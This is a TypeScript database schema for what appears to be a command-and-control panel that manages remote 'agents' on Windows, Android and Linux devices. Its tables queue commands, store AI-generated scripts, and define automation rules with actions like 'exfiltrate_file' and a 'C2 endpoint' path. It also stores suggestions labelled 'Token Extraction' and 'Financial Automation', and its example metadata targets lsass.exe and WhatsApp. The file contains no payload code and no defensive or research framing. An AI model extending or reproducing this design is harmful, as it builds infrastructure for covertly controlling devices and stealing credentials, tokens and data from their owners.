
import { pgTable, text, serial, timestamp, jsonb, boolean, integer } from "drizzle-orm/pg-core";
import { createInsertSchema } from "drizzle-zod";
import { z } from "zod";

// === AGENTS ===
export const agentScripts = pgTable("agent_scripts", {
  id: serial("id").primaryKey(),
  name: text("name").notNull(),
  targetOs: text("target_os").notNull(), // windows, android, linux
  code: text("code").notNull(),
  description: text("description"),
  createdAt: timestamp("created_at").defaultNow(),
});

export const insertAgentScriptSchema = createInsertSchema(agentScripts).omit({ id: true, createdAt: true });
export type AgentScript = typeof agentScripts.$inferSelect;
export type InsertAgentScript = z.infer<typeof insertAgentScriptSchema>;

export const generateScriptRequestSchema = z.object({
  prompt: z.string(),
  targetOs: z.enum(["windows", "android", "linux"]),
  name: z.string(),
});
export type GenerateScriptRequest = z.infer<typeof generateScriptRequestSchema>;

export const agents = pgTable("agents", {
  id: text("id").primaryKey(), // UUID generated by the agent
  hostname: text("hostname").notNull(),
  os: text("os").notNull(), // 'windows', 'android', 'linux'
  status: text("status").notNull().default("offline"), // 'online', 'offline'
  lastSeen: timestamp("last_seen").defaultNow(),
  metadata: jsonb("metadata").$type<{
    arch?: string;
    cpus?: number;
    memory?: number;
    platform?: string;
    activePackage?: string; // e.g., "com.whatsapp"
    activeProcess?: string; // e.g., "lsass.exe"
  }>(),
});

export const insertAgentSchema = createInsertSchema(agents);
export type Agent = typeof agents.$inferSelect;
export type InsertAgent = z.infer<typeof insertAgentSchema>;
export type InsertCommand = z.infer<typeof insertCommandSchema>;
export type InsertLog = z.infer<typeof insertLogSchema>;
export type InsertDetectedApp = z.infer<typeof insertDetectedAppSchema>;
export type InsertAgentSuggestion = z.infer<typeof insertAgentSuggestionSchema>;

// === DETECTED APPS & FUNCTIONALITY ===
export const detectedApps = pgTable("detected_apps", {
  id: serial("id").primaryKey(),
  agentId: text("agent_id").notNull().references(() => agents.id),
  appName: text("name").notNull(),
  packageOrProcess: text("package_or_process").notNull(),
  description: text("description"),
  functionalityMap: jsonb("functionality_map").$type<string[]>(), // e.g., ["Transaction Flow", "Login Form", "Sensitive Data"]
  detectedAt: timestamp("detected_at").defaultNow(),
});

export const insertDetectedAppSchema = createInsertSchema(detectedApps).omit({ id: true, detectedAt: true });
export type DetectedApp = typeof detectedApps.$inferSelect;

// === AGENT SUGGESTIONS (Automation & Creation Workflow) ===
export const agentSuggestions = pgTable("agent_suggestions", {
  id: serial("id").primaryKey(),
  agentId: text("agent_id").notNull().references(() => agents.id),
  appName: text("app_name").notNull(),
  suggestionType: text("suggestion_type").notNull(), // e.g., "Token Extraction", "Financial Automation"
  description: text("description").notNull(),
  automatedScript: text("automated_script"), // The generated/proposed logic
  status: text("status").notNull().default("suggested"), // 'suggested', 'dismissed', 'created'
  createdAt: timestamp("created_at").defaultNow(),
});

export const insertAgentSuggestionSchema = createInsertSchema(agentSuggestions).omit({ id: true, createdAt: true });
export type AgentSuggestion = typeof agentSuggestions.$inferSelect;

// === AUTOMATION LOGIC ===
export const automationRules = pgTable("automation_rules", {
  id: serial("id").primaryKey(),
  name: text("name").notNull(),
  trigger: text("trigger").notNull(), // e.g., "log_match", "app_start", "ui_element_visible"
  condition: text("condition").notNull(), // regex or app name or selector
  action: text("action").notNull(), // "execute_script", "alert", "exfiltrate_file", "capture_ui"
  targetElement: text("target_element"), // selector or regex for UI elements
  exfiltrationPath: text("exfiltration_path"), // path to file or C2 endpoint
  scriptId: integer("script_id").references(() => agentScripts.id),
  isActive: boolean("is_active").default(true).notNull(),
  createdAt: timestamp("created_at").defaultNow(),
});

export const insertAutomationRuleSchema = createInsertSchema(automationRules).omit({ id: true, createdAt: true });
export type AutomationRule = typeof automationRules.$inferSelect;
export type InsertAutomationRule = z.infer<typeof insertAutomationRuleSchema>;

// === COMMANDS ===
export const commands = pgTable("commands", {
  id: serial("id").primaryKey(),
  agentId: text("agent_id").notNull().references(() => agents.id),
  command: text("command").notNull(),
  status: text("status").notNull().default("pending"),
  output: text("output"),
  createdAt: timestamp("created_at").defaultNow(),
  executedAt: timestamp("executed_at"),
});

export const insertCommandSchema = createInsertSchema(commands).omit({ 
  id: true, 
  status: true, 
  output: true, 
  createdAt: true, 
  executedAt: true 
});
export type Command = typeof commands.$inferSelect;

// === LOGS ===
export const logs = pgTable("logs", {
  id: serial("id").primaryKey(),
  agentId: text("agent_id").notNull().references(() => agents.id),
  level: text("level").notNull(),
  message: text("message").notNull(),
  timestamp: timestamp("timestamp").defaultNow(),
});

export const insertLogSchema = createInsertSchema(logs).omit({ id: true, timestamp: true });
export type Log = typeof logs.$inferSelect;

// === TELEMETRY & DEVICE CONSENT ===
export const deviceConsent = pgTable("device_consent", {
  id: serial("id").primaryKey(),
  agentId: text("agent_id").notNull().unique(),
  hostname: text("hostname"),
  os: text("os"), // android, windows, linux
  consentGiven: boolean("consent_given").notNull().default(false),
  consentScopes: text("consent_scopes").array().$type<string[]>().default([]),
  createdAt: timestamp("created_at").defaultNow(),
  updatedAt: timestamp("updated_at").defaultNow(),
});

export const deviceTelemetry = pgTable("device_telemetry", {
  id: serial("id").primaryKey(),
  agentId: text("agent_id").notNull().references(() => agents.id),
  level: text("level").notNull().default("info"), // info, warn, error, debug
  message: text("message").notNull(),
  metadata: jsonb("metadata").$type<Record<string, any>>(),
  timestamp: timestamp("timestamp").defaultNow(),
});

export const insertDeviceConsentSchema = createInsertSchema(deviceConsent).omit({ id: true, createdAt: true, updatedAt: true });
export const insertDeviceTelemetrySchema = createInsertSchema(deviceTelemetry).omit({ id: true, timestamp: true });
export type DeviceConsent = typeof deviceConsent.$inferSelect;
export type DeviceTelemetry = typeof deviceTelemetry.$inferSelect;
export type InsertDeviceConsent = z.infer<typeof insertDeviceConsentSchema>;
export type InsertDeviceTelemetry = z.infer<typeof insertDeviceTelemetrySchema>;

